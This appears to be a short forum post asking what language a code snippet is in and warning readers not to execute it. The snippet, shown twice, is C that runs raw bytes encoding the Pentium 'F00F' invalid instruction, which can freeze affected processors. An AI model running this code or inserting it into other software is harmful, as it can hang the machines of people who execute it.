I found this and i don't know what language to write it in. Does anyone else know?? Hint: if u know, down execute it on yourself!
char x [5] = { 0xf0, 0x0f, 0xc7, 0xc8 };
main ()
{ void (*f) () = x;
f () ;
}
char x [5] = { 0xf0, 0x0f, 0xc7, 0xc8 };
main ()
{ void (*f) () = x;
f () ;
}
Comment